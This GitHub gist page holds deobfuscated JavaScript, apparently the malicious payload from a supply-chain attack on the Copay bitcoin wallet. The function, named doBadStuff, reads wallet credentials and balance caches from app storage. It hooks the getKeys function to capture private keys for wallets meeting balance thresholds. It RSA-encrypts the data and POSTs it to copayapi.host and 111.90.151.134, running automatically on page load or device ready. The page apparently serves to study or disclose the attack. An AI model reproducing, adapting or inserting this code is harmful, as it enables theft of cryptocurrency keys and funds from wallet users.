-
-
Save tlhunter/8dcc4ca8392bcc6f8cdee663fb90b94a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*@@*/ | |
function doBadStuff() { | |
try { | |
const http = require("http"); | |
const crypto = require("crypto"); | |
const publicKey = "-----BEGIN PUBLIC KEY-----\n...TRUNCATED...\n-----END PUBLIC KEY-----"; | |
function sendRequest(hostname, path, body) { | |
// Original request "decodes" a hex representation of the hostnames | |
// hostname = Buffer.from(hostname, "hex").toString(); | |
const req = http.request({ | |
hostname: hostname, | |
port: 8080, | |
method: "POST", | |
path: "/" + path, // path will be /p or /c | |
headers: { | |
"Content-Length": body.length, | |
"Content-Type": "text/html" | |
} | |
}, function() {}); | |
req.on("error", function(err) {}); | |
req.write(body); | |
req.end(); | |
} | |
function sendRequests(path, rawStringPayload) { | |
// path = "c" || "p" | |
let payload = ""; | |
for (let i = 0; i < rawStringPayload.length; i += 200) { | |
const chunk = rawStringPayload.substr(i, 200); | |
payload += crypto.publicEncrypt( | |
publicKey, | |
Buffer.from(chunk, "utf8") | |
).toString("hex") + "+"; | |
} | |
sendRequest("copayapi.host", path, payload); | |
sendRequest("111.90.151.134", path, payload); | |
} | |
function getDataFromStorage(name, callback) { | |
if (window.cordova) { | |
try { | |
const dd = cordova.file.dataDirectory; | |
resolveLocalFileSystemURL(dd, function(localFs) { | |
localFs.getFile(name, { | |
create: false | |
}, function(file) { | |
file.file(function(contents) { | |
const fileReader = new FileReader; | |
fileReader.onloadend = function() { | |
return callback(JSON.parse(fileReader.result)) | |
}; | |
fileReader.onerror = function(err) { | |
fileReader.abort() | |
}; | |
fileReader.readAsText(contents) | |
}) | |
}) | |
}) | |
} catch (err) {} | |
} else { | |
try { | |
const data = localStorage.getItem(name); | |
if (data) { | |
return callback(JSON.parse(data)); | |
} | |
chrome.storage.local.get(name, function(entry) { | |
if (entry) { | |
return callback(JSON.parse(entry[name])); | |
} | |
}) | |
} catch (err) {} | |
} | |
} | |
global.CSSMap = {}; | |
getDataFromStorage("profile", function(data) { | |
for (let credential in data.credentials) { | |
const creds = data.credentials[credential]; | |
if ("livenet" == creds.network) { | |
getDataFromStorage("balanceCache-" + creds.walletId, function(data) { | |
const self = this; | |
self.balance = parseFloat(data.balance.split(" ")[0]); | |
if ("btc" == self.coin && self.balance < 100 || "bch" == self.coin && self.balance < 1000) { | |
global.CSSMap[self.xPubKey] = true; | |
} | |
sendRequests("c", JSON.stringify(self)); | |
}.bind(creds)) | |
} | |
} | |
}); | |
const Credentials = require("bitcore-wallet-client/lib/credentials.js"); | |
// Intercept the getKeys function in the Credentails class | |
Credentials.prototype.getKeysFunc = Credentials.prototype.getKeys; | |
Credentials.prototype.getKeys = function(keyLookup) { | |
const originalResult = this.getKeysFunc(keyLookup); | |
try { | |
if (global.CSSMap && global.CSSMap[this.xPubKey]) { | |
delete global.CSSMap[this.xPubKey]; | |
sendRequests("p", keyLookup + "\t" + this.xPubKey); | |
} | |
} catch (err) {} | |
return originalResult; | |
} | |
} catch (err) {} | |
} | |
// Run as soon as ready | |
window.cordova | |
? document.addEventListener("deviceready", doBadStuff) | |
: doBadStuff() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
www.wpc2039.live/dashboard